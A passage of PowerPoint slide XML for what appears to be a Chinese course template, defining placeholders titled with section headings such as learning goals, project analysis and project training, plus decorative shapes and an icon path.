                  <a:defRPr lang="zh-CN"/>
                </a:defPPr>
                <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                  <a:spcBef>
                    <a:spcPct val="20000"/>
                  </a:spcBef>
                  <a:buNone/>
                  <a:defRPr sz="2000" b="1" baseline="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:defRPr>
                </a:lvl1pPr>
                <a:lvl2pPr marL="457200" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1200"/>
                </a:lvl2pPr>
                <a:lvl3pPr marL="914400" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1000"/>
                </a:lvl3pPr>
                <a:lvl4pPr marL="1371600" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl4pPr>
                <a:lvl5pPr marL="1828800" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl5pPr>
                <a:lvl6pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl6pPr>
                <a:lvl7pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl7pPr>
                <a:lvl8pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl8pPr>
                <a:lvl9pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl9pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" dirty="0"/>
                  <a:t>学习目标</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="67" name="Text Placeholder 3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3020" y="6955"/>
                <a:ext cx="1600" cy="484"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle>
                <a:defPPr>
                  <a:defRPr lang="zh-CN"/>
                </a:defPPr>
                <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                  <a:spcBef>
                    <a:spcPct val="20000"/>
                  </a:spcBef>
                  <a:buNone/>
                  <a:defRPr sz="2000" b="1" baseline="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:defRPr>
                </a:lvl1pPr>
                <a:lvl2pPr marL="457200" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1200"/>
                </a:lvl2pPr>
                <a:lvl3pPr marL="914400" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1000"/>
                </a:lvl3pPr>
                <a:lvl4pPr marL="1371600" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl4pPr>
                <a:lvl5pPr marL="1828800" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl5pPr>
                <a:lvl6pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl6pPr>
                <a:lvl7pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl7pPr>
                <a:lvl8pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl8pPr>
                <a:lvl9pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl9pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                  <a:t>项目分析</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="70" name="Text Placeholder 3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5759" y="6955"/>
                <a:ext cx="1600" cy="484"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle>
                <a:defPPr>
                  <a:defRPr lang="zh-CN"/>
                </a:defPPr>
                <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                  <a:spcBef>
                    <a:spcPct val="20000"/>
                  </a:spcBef>
                  <a:buNone/>
                  <a:defRPr sz="2000" b="1" baseline="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:defRPr>
                </a:lvl1pPr>
                <a:lvl2pPr marL="457200" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1200"/>
                </a:lvl2pPr>
                <a:lvl3pPr marL="914400" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1000"/>
                </a:lvl3pPr>
                <a:lvl4pPr marL="1371600" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl4pPr>
                <a:lvl5pPr marL="1828800" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl5pPr>
                <a:lvl6pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl6pPr>
                <a:lvl7pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl7pPr>
                <a:lvl8pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl8pPr>
                <a:lvl9pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl9pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                  <a:t>相关知识</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="73" name="Text Placeholder 3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8551" y="6955"/>
                <a:ext cx="1600" cy="484"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle>
                <a:defPPr>
                  <a:defRPr lang="zh-CN"/>
                </a:defPPr>
                <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                  <a:spcBef>
                    <a:spcPct val="20000"/>
                  </a:spcBef>
                  <a:buNone/>
                  <a:defRPr sz="2000" b="1" baseline="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:defRPr>
                </a:lvl1pPr>
                <a:lvl2pPr marL="457200" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1200"/>
                </a:lvl2pPr>
                <a:lvl3pPr marL="914400" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1000"/>
                </a:lvl3pPr>
                <a:lvl4pPr marL="1371600" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl4pPr>
                <a:lvl5pPr marL="1828800" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl5pPr>
                <a:lvl6pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl6pPr>
                <a:lvl7pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl7pPr>
                <a:lvl8pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl8pPr>
                <a:lvl9pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl9pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                  <a:t>项目实例</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="76" name="Text Placeholder 3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="11344" y="6929"/>
                <a:ext cx="1600" cy="484"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle>
                <a:defPPr>
                  <a:defRPr lang="zh-CN"/>
                </a:defPPr>
                <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                  <a:spcBef>
                    <a:spcPct val="20000"/>
                  </a:spcBef>
                  <a:buNone/>
                  <a:defRPr sz="2000" b="1" baseline="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:defRPr>
                </a:lvl1pPr>
                <a:lvl2pPr marL="457200" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1200"/>
                </a:lvl2pPr>
                <a:lvl3pPr marL="914400" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1000"/>
                </a:lvl3pPr>
                <a:lvl4pPr marL="1371600" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl4pPr>
                <a:lvl5pPr marL="1828800" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl5pPr>
                <a:lvl6pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl6pPr>
                <a:lvl7pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl7pPr>
                <a:lvl8pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl8pPr>
                <a:lvl9pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl9pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                  <a:t>项目实施</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="84" name="Text Placeholder 3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId5"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="13895" y="6880"/>
                <a:ext cx="1600" cy="484"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle>
                <a:defPPr>
                  <a:defRPr lang="zh-CN"/>
                </a:defPPr>
                <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                  <a:spcBef>
                    <a:spcPct val="20000"/>
                  </a:spcBef>
                  <a:buNone/>
                  <a:defRPr sz="2000" b="1" baseline="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:defRPr>
                </a:lvl1pPr>
                <a:lvl2pPr marL="457200" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1200"/>
                </a:lvl2pPr>
                <a:lvl3pPr marL="914400" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1000"/>
                </a:lvl3pPr>
                <a:lvl4pPr marL="1371600" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl4pPr>
                <a:lvl5pPr marL="1828800" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl5pPr>
                <a:lvl6pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl6pPr>
                <a:lvl7pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl7pPr>
                <a:lvl8pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl8pPr>
                <a:lvl9pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl9pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                  <a:t>项目训练</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="86" name="Group 26"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="16233" y="2830"/>
              <a:ext cx="2054" cy="3672"/>
              <a:chOff x="5960997" y="2484779"/>
              <a:chExt cx="1304471" cy="2341845"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="87" name="Group 27"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="5960997" y="2484779"/>
                <a:ext cx="1304471" cy="2341845"/>
                <a:chOff x="5960997" y="2484779"/>
                <a:chExt cx="1304471" cy="2341845"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="88" name="Group 29"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5960997" y="2484779"/>
                  <a:ext cx="1304471" cy="1802479"/>
                  <a:chOff x="3149600" y="2480384"/>
                  <a:chExt cx="1201204" cy="1660005"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="89" name="等腰三角形 51"/>
                  <p:cNvSpPr/>
                  <p:nvPr>
                    <p:custDataLst>
                      <p:tags r:id="rId6"/>
                    </p:custDataLst>
                  </p:nvPr>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm flipV="1">
                    <a:off x="3149600" y="3200883"/>
                    <a:ext cx="1201204" cy="939506"/>
                  </a:xfrm>
                  <a:prstGeom prst="triangle">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:gradFill>
                    <a:gsLst>
                      <a:gs pos="0">
                        <a:schemeClr val="accent3"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="EEECE1">
                          <a:lumMod val="90000"/>
                          <a:alpha val="0"/>
                        </a:srgbClr>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="5400000" scaled="0"/>
                  </a:gradFill>
                  <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="90" name="矩形 52"/>
                  <p:cNvSpPr/>
                  <p:nvPr>
                    <p:custDataLst>
                      <p:tags r:id="rId7"/>
                    </p:custDataLst>
                  </p:nvPr>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="3630724" y="2480384"/>
                    <a:ext cx="720080" cy="720080"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:solidFill>
                    <a:schemeClr val="accent3"/>
                  </a:solidFill>
                  <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst>
                    <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                      <a:srgbClr val="000000">
                        <a:alpha val="35000"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:scene3d>
                    <a:camera prst="isometricOffAxis2Top">
                      <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                    </a:camera>
                    <a:lightRig rig="chilly" dir="t">
                      <a:rot lat="0" lon="0" rev="600000"/>
                    </a:lightRig>
                  </a:scene3d>
                  <a:sp3d extrusionH="666750"/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="91" name="Oval 30"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr>
                  <p:custDataLst>
                    <p:tags r:id="rId8"/>
                  </p:custDataLst>
                </p:nvPr>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6312532" y="4240732"/>
                  <a:ext cx="585892" cy="585892"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln w="3810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id-ID"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="92" name="AutoShape 112"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId9"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6453017" y="4367800"/>
                <a:ext cx="328308" cy="328869"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T1" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T2" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T3" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T4" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T5" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T6" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T7" fmla="*/ 10800 h 21600"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="21020" h="21600">
                    <a:moveTo>
                      <a:pt x="18846" y="7946"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="17740" y="9091"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="17740" y="8939"/>
                      <a:pt x="17758" y="8792"/>
                      <a:pt x="17744" y="8636"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17629" y="7331"/>
                      <a:pt x="17036" y="6068"/>
                      <a:pt x="16074" y="5080"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15004" y="3980"/>
                      <a:pt x="13585" y="3348"/>
                      <a:pt x="12180" y="3345"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="13268" y="2218"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="13812" y="1659"/>
                      <a:pt x="14572" y="1350"/>
                      <a:pt x="15403" y="1350"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16460" y="1350"/>
                      <a:pt x="17546" y="1840"/>
                      <a:pt x="18381" y="2696"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19165" y="3500"/>
                      <a:pt x="19631" y="4499"/>
                      <a:pt x="19698" y="5510"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19760" y="6453"/>
                      <a:pt x="19457" y="7317"/>
                      <a:pt x="18846" y="7946"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="5828" y="19329"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="5813" y="18424"/>
                      <a:pt x="5454" y="17481"/>
                      <a:pt x="4730" y="16739"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4046" y="16034"/>
                      <a:pt x="3150" y="15628"/>
                      <a:pt x="2257" y="15592"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2911" y="13157"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2959" y="12995"/>
                      <a:pt x="3052" y="12835"/>
                      <a:pt x="3168" y="12695"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4485" y="11726"/>
                      <a:pt x="6512" y="12012"/>
                      <a:pt x="7920" y="13460"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9409" y="14990"/>
                      <a:pt x="9639" y="17230"/>
                      <a:pt x="8492" y="18568"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8416" y="18609"/>
                      <a:pt x="8339" y="18648"/>
                      <a:pt x="8256" y="18675"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8256" y="18675"/>
                      <a:pt x="5828" y="19329"/>
                      <a:pt x="5828" y="19329"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="2737" y="20164"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2665" y="20181"/>
                      <a:pt x="2443" y="20239"/>
                      <a:pt x="2291" y="20249"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1751" y="20244"/>
                      <a:pt x="1313" y="19792"/>
                      <a:pt x="1313" y="19237"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1321" y="19124"/>
                      <a:pt x="1365" y="18929"/>
                      <a:pt x="1380" y="18857"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2071" y="16283"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2822" y="16261"/>
                      <a:pt x="3630" y="16562"/>
                      <a:pt x="4265" y="17215"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4911" y="17878"/>
                      <a:pt x="5214" y="18725"/>
                      <a:pt x="5181" y="19504"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5181" y="19504"/>
                      <a:pt x="2737" y="20164"/>
                      <a:pt x="2737" y="20164"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="6888" y="11179"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="6280" y="10927"/>
                      <a:pt x="5642" y="10783"/>
                      <a:pt x="5004" y="10774"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="10063" y="5536"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="10838" y="4759"/>
                      <a:pt x="11966" y="4536"/>
                      <a:pt x="13077" y="4819"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13077" y="4819"/>
                      <a:pt x="6888" y="11179"/>
                      <a:pt x="6888" y="11179"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="9717" y="13672"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="9473" y="13258"/>
                      <a:pt x="9194" y="12859"/>
                      <a:pt x="8848" y="12505"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8447" y="12093"/>
                      <a:pt x="7986" y="11770"/>
                      <a:pt x="7507" y="11498"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="13767" y="5064"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="14259" y="5288"/>
                      <a:pt x="14729" y="5607"/>
                      <a:pt x="15145" y="6035"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15500" y="6398"/>
                      <a:pt x="15775" y="6806"/>
                      <a:pt x="15987" y="7229"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15987" y="7229"/>
                      <a:pt x="9717" y="13672"/>
                      <a:pt x="9717" y="13672"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="10519" y="16061"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="10465" y="15452"/>
                      <a:pt x="10298" y="14854"/>
                      <a:pt x="10047" y="14288"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="16257" y="7906"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="16637" y="9140"/>
                      <a:pt x="16442" y="10429"/>
                      <a:pt x="15610" y="11284"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15604" y="11290"/>
                      <a:pt x="15598" y="11293"/>
                      <a:pt x="15593" y="11298"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="15602" y="11306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10525" y="16565"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="10527" y="16397"/>
                      <a:pt x="10534" y="16232"/>
                      <a:pt x="10519" y="16061"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="19308" y="1741"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="18228" y="632"/>
                      <a:pt x="16805" y="0"/>
                      <a:pt x="15403" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14220" y="0"/>
                      <a:pt x="13131" y="450"/>
                      <a:pt x="12335" y="1266"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9138" y="4577"/>
